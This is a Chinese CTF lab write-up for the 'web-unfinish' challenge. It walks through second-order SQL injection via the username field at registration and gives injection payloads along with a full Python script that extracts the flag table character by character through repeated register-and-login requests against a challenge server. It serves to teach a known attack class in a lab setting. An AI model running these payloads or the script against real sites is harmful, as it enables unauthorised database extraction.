news 2026/5/1 11:23:05

[CTF]攻防世界:web-unfinish(sql二次注入)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[CTF]攻防世界:web-unfinish(sql二次注入)

题目:web-unfinish(sql二次注入)

二次注入

打开页面是一个登录页面

步骤

  1. 扫描一下目录:


有登录有注册

  1. 先测试登录是否存在sql,测试了一下发现似乎不存在。
  1. 继续测试注册,先正常注册一个用户,登录看看。

    登录成功,能看到用户名。
  1. 试试再注册的时候,给用户名位置写上注入测试:0’+1+'0,登录后发现用户名变为1.

使用Burp Suite Fuzz 了一下,当用户名中有 information 或 , 时,会提示 nonono!!!

  1. 只能猜表名为flag.
    通过payload依次读取flag值:0'+ascii(substr(select * from flag) from 1 for 1)+'0
  1. 写个脚本,自动读出flag。

流程为:注册-》登录-》获取用户名值(ascii)

importrequestsimportreimporttime url="http://61.147.171.105:54224/"MAX_RETRIES_PER_POS=5# 重试 defget_flag():flag=""i=1# 从位置1开始whilei<50:email=f"user{i}@qq.com"username_payload=f"0'+ascii(SUBSTR((select * from flag) FROM {i} FOR 1))+'0"password="123"retry_count=0success=Falsewhileretry_count<=MAX_RETRIES_PER_POS:ifretry_count>0:print(f"[!] 尝试位置 {i} (尝试 {retry_count + 1})...")time.sleep(2)# 稍等再试try:print(f"[+] 尝试位置 {i}: {username_payload}")# 注册 r_reg=requests.post(url+"register.php",data={'email':email,'username':username_payload,'password':password},allow_redirects=False,timeout=10)ifr_reg.status_code!=302:# 可能是 SQL 错误或 flag 已结束(非网络问题)print(f"[-] 注册失败 {r_reg.status_code} 再位置 {i}. 结束.")success=True # 视为“正常结束”,跳出break# 登录 r_login=requests.post(url+"login.php",data={'email':email,'password':password},timeout=10)# 提取 ASCII match=re.search(r'<span class="user-name">\s*(\d+)\s*</span>',r_login.text)ifmatch:ascii_val=int(match.group(1))ifascii_val==0:print("[*] 结尾 (ASCII 0).")success=Truebreakchar=chr(ascii_val)flag+=charprint(f"[+] 位置 {i}: ASCII={ascii_val} => '{char}' | Flag : {flag}")success=Truebreakelse:print(f"[-] 找不到flag {i} :\n{r_login.text[:200]}")success=True # 无法提取,视为结束breakexcept(requests.exceptions.Timeout,requests.exceptions.ConnectionError)ase:retry_count+=1print(f"[-] 网络问题 position {i} (attempt {retry_count}): {e}")ifretry_count>MAX_RETRIES_PER_POS:print(f"[!] 超过最大重试 position {i}. 退出.")print("\n[!] flag (部分):",flag)returncontinue# 重试当前 i except Exceptionase:print(f"[-] 异常 position {i}: {e}")success=True # 非网络异常,不重试breakifnot success:print(f"[!] 错误 position {i} .")breakifsuccess and(r_reg.status_code!=302or(locals().get('match')andint(locals().get('match').group(1))==0)or notlocals().get('match')):breaki+=1# 成功获取一位,继续下一位 time.sleep(3)print("\n[!] flag:",flag)if__name__=='__main__':get_flag()

有疑问可留言解答…

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/1 5:11:36

Comsol 中双温模型下脉冲移动激光与耦合应力场的二维三维探索

comsol双温模型脉冲移动激光 耦合应力场 二维三维在材料加工、激光焊接等诸多领域&#xff0c;理解脉冲移动激光与材料相互作用时的热效应以及由此引发的应力场变化至关重要。Comsol Multiphysics 作为一款强大的多物理场仿真软件&#xff0c;为我们研究这些复杂现象提供了有力…

作者头像 李华
网站建设 2026/5/1 5:09:49

61、【Ubuntu】【Gitlab】拉出内网 Web 服务:Gitlab 配置审视(五)

【声明】本博客所有内容均为个人业余时间创作&#xff0c;所述技术案例均来自公开开源项目&#xff08;如Github&#xff0c;Apache基金会&#xff09;&#xff0c;不涉及任何企业机密或未公开技术&#xff0c;如有侵权请联系删除 背景 上篇 blog 【Ubuntu】【Gitlab】拉出内网…

作者头像 李华
网站建设 2026/5/1 5:11:16

HDFS中fsimage文件的作用

在HDFS&#xff08;Hadoop分布式文件系统&#xff09;中&#xff0c;fsimage文件是NameNode的关键持久化文件&#xff0c;其作用如下&#xff1a;namenode 中存储的是元数据&#xff0c;而且是存储在内存中。 突然电脑宕机了&#xff0c;数据没了。所以namenode的元数据非常的重…

作者头像 李华
网站建设 2026/5/1 7:20:00

HDFS的edits文件

HDFS的edits文件是元数据操作日志的核心组成部分&#xff0c;用于记录所有对文件系统命名空间&#xff08;Namespace&#xff09;的修改操作。以下是其关键特性与作用&#xff1a;fsiamge 每隔一个小时保存一份&#xff0c;假如在这一个小时内&#xff0c;突然宕机了&#xff0…

作者头像 李华
网站建设 2026/5/1 10:02:12

hdfs配置文件里dfs.namenode.safemode.threshold-pct作用

好的&#xff0c;我们来解释一下 HDFS 配置文件中的 dfs.namenode.safemode.threshold-pct 参数。threshold-pct&#xff1a;关注数据块的完整性&#xff0c;要求满足最小副本数的块占比达到阈值&#xff08;默认99.9%&#xff09;。min.datanodes&#xff1a;关注集群的可用性…

作者头像 李华
网站建设 2026/5/1 7:14:12

Combiner在mapreduce中的作用

Combiner在MapReduce框架中扮演着优化性能的关键角色&#xff0c;其主要作用体现在以下三方面&#xff1a;Combiner其实就是运行在mapTask中的reducer。 Reducer其实就是合并代码的。Combiner是作用在Map端的。这个结果不是最终的结果&#xff0c;而是一个临时的小统计。 最终r…

作者头像 李华